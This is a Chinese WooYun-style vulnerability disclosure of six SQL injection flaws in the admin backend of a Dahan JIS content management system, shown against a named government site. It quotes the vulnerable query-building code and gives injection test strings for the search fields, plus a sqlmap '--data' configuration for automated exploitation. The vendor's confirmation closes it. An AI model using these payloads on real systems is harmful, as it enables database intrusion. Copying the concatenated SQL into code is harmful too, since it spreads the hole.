漏洞详情

披露状态:

2014-01-27: 细节已通知厂商并且等待厂商处理中
2014-01-27: 厂商已经确认,细节仅向厂商公开
2014-01-30: 细节向第三方安全合作伙伴开放
2014-02-06: 细节向核心白帽子及相关领域专家公开
2014-02-16: 细节向普通白帽子公开
2014-03-08: 细节向实习白帽子公开
2014-04-27: 细节向公众公开

简要描述:

只是冲着数量来的。后台SQL注入,有点怀疑是实习程序员……临时工的作品?

详细说明:

后台SQL1

第一个先拿一个麻烦一点的来演示,后面的同理

需要有应用管理员或者系统管理员的权限登录。

/jis/manage/datasbase/que_datasbase.jsp

if (que_keywords.length() > 0) {
strSqlCondition.append(" AND vc_collocatename like '%" + que_keywords
+ "%'");
}



为了配合工具利用,需要先新增监听管理:

http://management.ysx.gov.cn/jis/manage/datasbase/opr_datasbase.jsp?fn_billstatus=A&

image025.png



只要是公网可以访问的IP,而且用户名、密码是对的就行了。否则会提示无法连接之类的

image027.png



添加了之后就有作为标识用的字符串出来了

在搜索框内输入' and '%'='

页面没有变化

image029.png



输入' and '1'=',页面变化了

image031.png



带上cookie丢工具吧

Sqlmap配置data的时候这样来比较好:--data "que_keywords=' * and '%'='"

image033.png



image035.png







后台SQL2

jis/manage/app/que_application.jsp

if (que_keywords.length() > 0) {
strSqlCondition.append(" AND vc_appname LIKE '%" + que_keywords+ "%' OR vc_appmark LIKE '%"
+ que_keywords+ "%'");
}



权限要求同上

照旧,搜索处输入' and '%'='

image037.png



' and '1'='

image039.png



工具利用方法类似上一个。





后台SQL3

jis/sys/user/que_userginfo.jsp

类似上两个漏洞

if(que_keywords.length()>0)
strSqlCondition.append(" AND vc_usergroupname like '%"+que_keywords+
"%' OR vc_groupallname like '%"+que_keywords+"%'");



搜索输入

' and '%'='

搜索出所有结果:

image041.png

漏洞证明:

后台SQL4

jis/manage/role/que_approleinfo.jsp

if(que_keywords.length()>0) {
strSqlCondition.append(" AND vc_rolename like '%"+que_keywords+"%'");
}
if(que_webid.length()>0) {
strSqlCondition.append(" AND i_webid = '"+que_webid+"'");
}



输入' and '%'='

image043.png



' and '%'='1

image045.png







后台SQL5

jis/manage/log/que_log.jsp

if(que_keywords.length()>0){
strSqlCondition.append(" AND vc_operatecontent like '%"+que_keywords+"%' OR c_userid like '%"+que_keywords+"%' OR vc_modulename like '%"+que_keywords+"%' OR vc_state like '%"+que_keywords+"%' ");
}



搜索输入

admin%' or '%'='

出来全部结果:

image047.png



改为admin%' and '%'='

则只出现admin的日志:

image049.png





后台SQL6

jis/manage/sysview/que_sysview.jsp

输入fgj' or '%'='

image051.png

修复方案:

厂商结合实际看吧

版权声明:转载请注明来源 wefgod@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-01-27 16:27

厂商回复:

非常感谢您对大汉产品的关注以及对产品安全方面的指正,问题已跟进处理

最新状态:

暂无


漏洞评价: